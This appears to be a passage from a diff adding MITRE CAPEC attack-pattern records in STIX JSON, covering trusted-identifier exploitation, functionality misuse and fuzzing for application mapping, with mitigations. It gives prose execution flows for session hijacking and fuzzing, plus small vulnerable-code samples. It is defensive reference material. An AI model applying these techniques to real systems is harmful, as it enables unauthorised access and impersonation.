", + "x_capec_prerequisites": [ + "The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.", + "The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to source the file of the incorrect MIME type containing a script." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": "Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

    2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

    2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.", + "id": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f9eaa515-4e04-4e48-a95a-a5cc76d3fae0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.", + "id": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65db9cb6-fc43-4034-b579-eb165dd5e4cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.", + "id": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e264f74e-3bd0-46ab-bd67-3526a6e9d54f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.", + "id": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12007caf-e1d7-492f-a685-f88c073bccb6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use strong session identifiers that are protected in transit and at rest.", + "id": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a4a61eb-f51c-417d-88d8-2417fea9f0a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", + "id": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c05cd2c-a62f-42aa-b4f2-db68b48a7d78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Verify authenticity of all identifiers at runtime.", + "id": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a9103ab-a9ea-40f7-9a9c-2789bebcf094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-211", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/211.html" + } + ], + "id": "attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.", + "external_references": [ + { + "external_id": "CAPEC-212", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + }, + { + "external_id": "CWE-1246", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1246.html" + }, + { + "external_id": "CWE-1281", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1281.html" + } + ], + "id": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Misuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack of this kind can compromise the confidentiality of an authorized user's credentials.)", + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Integrity": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59" + ], + "x_capec_prerequisites": [ + "The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes." + ], + "x_capec_skills_required": { + "Low": "General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.", + "id": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--264be4df-68bd-477a-8b05-e975efd6ada7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and compromised.", + "id": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3688d3c6-8574-4547-aa9d-2d75e6da59b3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-126 : Path Traversal\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-213", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/213.html" + } + ], + "id": "attack-pattern--3ec96bbd-da0c-4640-a8ae-50e506206a2b", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Directory Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was merged into \"CAPEC-215 : Fuzzing for application mapping\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-214", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/214.html" + } + ], + "id": "attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DEPRECATED: Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.", + "external_references": [ + { + "external_id": "CAPEC-215", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/215.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-532", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/532.html" + } + ], + "id": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Fuzzing for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--7f0ec88f-b057-4a73-93d8-8a30cfdbcf77" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following code generates an error message that leaks the full pathname of the configuration file.\n $ConfigDir = \"/home/myprog/config\";$uname = GetUserInput(\"username\");ExitError(\"Bad hacker!\") if ($uname !~ /^\\w+$/);$file = \"$ConfigDir/$uname.txt\";if (! (-e $file)) { ExitError(\"Error: $file does not exist\"); }...\n If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.\n ", + "\n In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.\n public void httpGet(HttpServletRequest request, HttpServletResponse response) {try {processRequest();} catch (Exception ex) {ex.printStackTrace(response.getWriter());\n return;}}\n If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Observe communication and inputs: The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.

    2. Techniques
    Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.
    Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.
    Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

  1. Generate fuzzed inputs: Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.

    2. Techniques
    Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
    Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.

  2. Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application

Exploit

  1. Craft exploit payloads: An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.

    2. Techniques
    Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.
    If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials.
", + "x_capec_extended_description": "\n By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must fail to sanitize incoming messages adequately before processing." + ], + "x_capec_resources_required": [ + "Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target." + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e83220a2-4674-498f-8f1f-684464a2de79", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6313ef4d-92ce-4fa2-89d3-e46c3645bc94", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98fe200c-e422-46ab-a1e3-1ece266fe87a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ 